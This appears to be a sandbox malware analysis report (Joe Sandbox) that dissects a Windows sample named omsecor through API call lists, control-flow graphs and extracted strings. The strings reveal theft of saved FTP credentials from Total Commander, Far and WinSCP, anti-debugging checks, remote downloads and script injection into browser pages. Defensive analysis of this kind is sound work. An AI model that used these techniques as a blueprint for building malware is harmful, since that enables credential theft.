                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 174 40b096-40b0ac call 40d5b0 177 40b0b5-40b0bb 174->177 178 40b0ae-40b0b0 174->178 180 40b0bd-40b0cd call 407995 177->180 181 40b0cf-40b0d1 call 407951 177->181 179 40b2c9-40b2cd 178->179 185 40b0d6-40b0e5 180->185 181->185 186 40b160-40b166 185->186 187 40b0e7-40b0f1 185->187 189 40b177 InternetClearAllPerSiteCookieDecisions 186->189 190 40b168-40b175 InternetSetPerSiteCookieDecisionW 186->190 187->186 188 40b0f3-40b0f9 187->188 188->186 192 40b0fb-40b10b GetModuleFileNameW 188->192 191 40b17d-40b184 call 4032b8 189->191 190->191 199 40b186-40b196 GetLastError call 40a786 191->199 200 40b199-40b1a2 191->200 194 40b116-40b118 GetCurrentDirectoryW 192->194 195 40b10d-40b114 call 406cf9 192->195 198 40b11e-40b15a call 405511 call 4054ed call 40253c 194->198 195->198 198->178 198->186 199->200 204 40b1a9-40b1ae 200->204 207 40b1b0-40b1cd CreateThread 204->207 208 40b1ce-40b1df 204->208 207->208 208->204 210 40b1e1-40b1e7 208->210 212 40b1e9-40b1eb 210->212 213 40b1ed-40b200 call 40a786 210->213 212->213 215 40b221-40b226 212->215 222 40b202-40b209 call 40b023 213->222 223 40b20e-40b210 213->223 218 40b228-40b23b CloseHandle 215->218 219 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 215->219 218->218 218->219 227 40b2c6-40b2c8 219->227 228 40b24d-40b257 219->228 222->223 223->215 225 40b212-40b21b WaitForMultipleObjects 223->225 225->215 227->179 228->227 229 40b259-40b25f 228->229 229->227 230 40b261-40b271 GetModuleFileNameW 229->230 231 40b273-40b27a call 406cf9 230->231 232 40b27c-40b27e GetCurrentDirectoryW 230->232 234 40b284-40b2c0 call 405511 call 4054ed call 40253c 231->234 232->234 234->178 234->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 242 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 251 403c75-403c77 242->251 252 403ca9-403cad 242->252 251->252 253 403c79-403c94 ExpandEnvironmentStringsW 251->253 254 403cb3-403d15 call 405511 * 3 252->254 255 403dfe 252->255 256 403c95 call 4039ea 253->256 271 403d18-403d34 SHGetFolderPathW 254->271 257 403e00-403e08 call 4033a0 255->257 258 403e0a-403e12 call 40be3a 255->258 260 403c9a-403ca3 PathRemoveFileSpecW 256->260 267 403e13-403e17 257->267 258->267 260->252 272 403d36-403d39 271->272 273 403d7f-403d86 271->273 275 403d5a 272->275 276 403d3b-403d58 call 4039a3 272->276 273->271 274 403d88-403d8c 273->274 274->255 279 403d8e-403dce call 405511 * 2 call 40848f 274->279 278 403d5c-403d76 275->278 276->278 281 403d77 call 408248 278->281 289 403dd0-403dd2 279->289 290 403dfa 279->290 283 403d7c 281->283 283->273 289->290 291 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 289->291 290->255 291->290
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 403 4027e6-402809 OleInitialize call 40a469 406 402813-402819 403->406 407 40280b-40280e 403->407 409 402820-402832 call 405511 406->409 410 40281b-40281e 406->410 408 402c2d-402c31 407->408 411 402838-40284f call 40a345 409->411 410->409 410->411 416 402851 411->416 417 40285f-402862 411->417 418 402852 call 40a65e 416->418 419 402864-402867 417->419 420 402869 417->420 421 402857-40285a 418->421 419->420 422 402879-40287d 419->422 423 402869 call 4072ed 420->423 426 402c2c 421->426 425 40287f call 409f2b 422->425 424 40286e-402873 423->424 424->422 427 402884-402888 425->427 426->408 428 402893-4028a0 427->428 429 40288a-40288d 427->429 431 4028a2-4028ad 428->431 432 4028b7-4028be 428->432 429->428 430 40296a 429->430 435 402970-402978 430->435 433 4028af call 408f26 431->433 432->430 434 4028c4-4028cc 432->434 436 4028b4 433->436 437 4028d3-4028e3 434->437 438 4028ce 434->438 439 402c20-402c23 435->439 440 40297e-402984 435->440 436->432 441 4028e5 call 408f26 437->441 438->437 442 402c25 call 40a65e 439->442 443 402986-4029a2 call 40a569 440->443 444 4029bc-4029c0 440->444 448 4028ea-4028ef 441->448 449 402c2a 442->449 457 4029a5 call 4089fd 443->457 446 4029c2-4029de call 40a569 444->446 447 4029f8-4029fc 444->447 467 4029e1 call 4089fd 446->467 452 402a04-402a0c 447->452 453 4029fe-402a02 447->453 454 4028f1-402925 call 407573 SysAllocString 448->454 455 402956-402957 448->455 449->426 460 402a3b-402a44 452->460 461 402a0e-402a35 call 40920a call 409c49 SysAllocString SysFreeString 452->461 453->452 453->460 470 402927-402938 SysFreeString 454->470 471 40293a-402941 454->471 459 402959 call 40a65e 455->459 464 4029aa-4029b8 457->464 468 40295e 459->468 465 402a46-402a5a 460->465 466 402a6f-402a73 460->466 461->460 464->444 472 402a5d call 408f26 465->472 473 402aa2-402aa6 466->473 474 402a75-402a8d 466->474 475 4029e6-4029f4 467->475 468->430 470->470 470->471 477 402943-402945 471->477 478 402947-40294a call 4091bd 471->478 479 402a62-402a6c SysAllocString 472->479 481 402ad1-402ad5 473->481 482 402aa8-402abc 473->482 480 402a90 call 408f26 474->480 475->447 486 40294f-402954 477->486 478->486 479->466 488 402a95-402a9f SysAllocString 480->488 483 402b04-402b07 481->483 484 402ad7-402aef 481->484 489 402abf call 408f26 482->489 491 402b09 call 40a65e 483->491 490 402af2 call 408f26 484->490 486->435 488->473 492 402ac4-402ace SysAllocString 489->492 493 402af7-402b01 SysAllocString 490->493 494 402b0e-402b11 491->494 492->481 493->483 495 402b13 494->495 496 402b1a-402b2d 494->496 495->496 497 402b49-402b4d 496->497 498 402b2f-402b47 call 407573 496->498 500 402b55-402b66 call 407573 call 409c49 497->500 501 402b4f-402b53 497->501 498->497 504 402b6b-402b6f 500->504 501->500 501->504 506 402b71-402b7e call 40584d call 409c49 504->506 507 402b83-402b87 504->507 506->507 510 402b89-402b9c call 407573 507->510 511 402b9e-402ba2 507->511 510->511 514 402ba4-402bad call 40584d 511->514 515 402baf-402be1 call 40584d 511->515 514->515 522 402be3-402be8 call 408825 515->522 523 402bea call 408692 515->523 527 402bef-402bf8 522->527 523->527 528 402bfa-402bfd 527->528 529 402bff 527->529 528->529 530 402c01-402c0f SysFreeString 528->530 529->530 530->439 531 402c11-402c1e SysFreeString 530->531 531->439 531->531
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 532 402e3e-402e59 call 40d5b0 535 40327e-403286 532->535 536 402e5f-402e60 532->536 537 402e61-402ea5 call 40586b call 4058fb 536->537 542 402eb4 537->542 543 402ea7-402ead 537->543 545 402eb7-402ecb GetModuleFileNameW 542->545 543->542 544 402eaf-402eb2 543->544 544->545 546 402ed6-402edc GetCurrentDirectoryW 545->546 547 402ecd-402ed4 call 406cf9 545->547 549 402ee2-402f14 call 405511 call 4054ed * 2 546->549 547->549 557 402f16-402f22 call 405467 549->557 558 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 549->558 557->558 563 402f24 557->563 570 402f96-402fa6 558->570 571 402fa8 call 4056f9 558->571 563->558 572 402fad-402fd8 call 4054ed * 2 call 40584d 570->572 571->572 580 402fda-402fea 572->580 581 402fec call 4056f9 572->581 582 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 580->582 581->582 592 40303a-40304a 582->592 593 40304c call 4056f9 582->593 594 403051-403081 call 4054ed * 3 call 40584d 592->594 593->594 604 403083-403093 594->604 605 403095-40309b call 4056f9 594->605 606 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 604->606 605->606 624 403251-40325f GetLastError 606->624 625 403138-40313e 606->625 628 403262-403276 call 40a786 624->628 626 403144-403148 625->626 627 40322d-403235 625->627 626->627 631 40314e-403186 call 40584d call 407552 call 405511 call 40584d 626->631 629 403241 627->629 630 403237-40323f GetLastError 627->630 628->537 637 40327c-40327d 628->637 633 403244-40324f 629->633 630->633 644 403188-403198 631->644 645 40319a call 4056f9 631->645 633->628 637->535 646 40319f-4031c8 call 4054ed * 2 call 40584d 644->646 645->646 654 4031ca-4031da 646->654 655 4031dc call 4056f9 646->655 656 4031e1-403228 call 4054ed * 2 call 40253c 654->656 655->656 656->624 664 40322a 656->664 664->627
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
